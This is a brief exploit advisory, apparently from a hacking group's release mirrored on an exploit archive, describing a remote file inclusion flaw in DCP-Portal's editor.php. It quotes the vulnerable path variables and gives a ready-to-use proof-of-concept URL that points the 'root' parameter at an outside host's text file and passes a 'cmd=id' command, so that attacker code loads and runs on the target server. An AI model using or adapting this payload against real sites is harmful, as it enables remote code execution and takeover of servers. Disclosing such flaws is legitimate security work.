DCP-Portal suffers from a remote file inclusion vulnerability.
7e4670df1ee7d0afcecf42349fc1b35d51f65cc439d486985ba851a160eac53f
# Kurdish Security Advisory
# irc.gigachat.net #kurdhack
# http://www.milw0rm.com/exploits/1905
# Editor DHTML Scripting bugz
$url_path_editor = "$root_url/library/editor/";
$abs_path_editor = "$root/library/editor/";
?>
Proof Of Concept
http://www.site.com/[dcpath]/library/editor/editor.php?root=http://www.yourscripts.com/x.txt?cmd=id